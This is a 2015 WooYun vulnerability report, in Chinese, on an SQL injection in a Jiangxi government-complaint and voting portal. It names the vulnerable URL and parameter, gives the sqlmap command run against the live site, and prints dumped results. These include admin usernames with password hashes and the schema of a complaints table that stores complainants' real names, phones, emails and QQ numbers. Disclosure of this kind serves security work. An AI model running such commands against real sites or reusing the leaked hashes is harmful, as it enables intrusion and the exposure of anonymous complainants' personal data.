当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093974

漏洞标题:问政江西SQL注入点(可作用于投诉\投票\新闻)

相关厂商:jxnews.com.cn

漏洞作者: 路人甲

提交时间:2015-01-27 10:20

修复时间:2015-02-01 10:22

公开时间:2015-02-01 10:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-02-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这个可以看到,投诉人的投诉具体信息哦~还能看到各种活动的投票数据内容.当然也有部分后台很容易找到..

详细说明:

通过这个点"http://wenz.jxnews.com.cn/ms/hyrd.php?id=6"可以看到他们数据库,其中包含一些活动投票管理,这些活动有一些全省选举之类的
百姓的一些匿名投诉管理.这个可以看到投诉人的一些信息之类的....似乎对投诉人不太妥吧
一些新闻内容...这个没啥说的

漏洞证明:

sqlmap.py -u http://wenz.jxnews.com.cn/ms/hyrd.php?id=6 --dbs
列一下部分数据内容,
数据库名是newdb2014
web application technology: Apache 2.4.4
back-end DBMS: MySQL 5.0.11
Database: newdb2014
Table: wzjx_admin
[2 entries]
+----+----------+-------------------+---------------------------------------+
| id | username | usertype | password |
+----+----------+-------------------+---------------------------------------+
| 1 | admin | 1,1,1,1,1,1,1,1,1 | a31fb2a5b2f9fa038b3aef7d82087f4b_temp |
| 4 | 9ec3811e5ca57e20b51a33b3f0b78f06_temp |
+----+----------+-------------------+---------------------------------------+
一些表的字段内容
web application technology: Apache 2.4.4
back-end DBMS: MySQL 5.0.11
Database: newdb2014
Table: zxjb
[31 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| app | varchar(2) |
| area | char(20) |
| areaid | int(2) |
| audit | int(2) |
| business | varchar(80) |
| businessid | int(2) |
| content | text |
| deltime | datetime |
| deltype | int(2) |
| department | varchar(80) |
| departmentid | varchar(2) |
| email | varchar(80) |
| hits | int(11) |
| id | int(20) |
| ip | char(40) |
| netname | char(40) |
| ordertag | int(2) |
| phone | char(20) |
| port | char(20) |
| qqnumber | char(20) |
| qtype | char(20) |
| qtypeid | tinyint(2) |
| realname | char(20) |
| reply | int(2) |
| sendtime | datetime |
| serverport | int(8) |
| title | varchar(400) |
| titletag | char(40) |
| titletag1 | varchar(80) |
| type | int(2) |
| viewurl | varchar(80) |
+--------------+--------------+

修复方案:

做过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-01 10:22

厂商回复:

最新状态:

暂无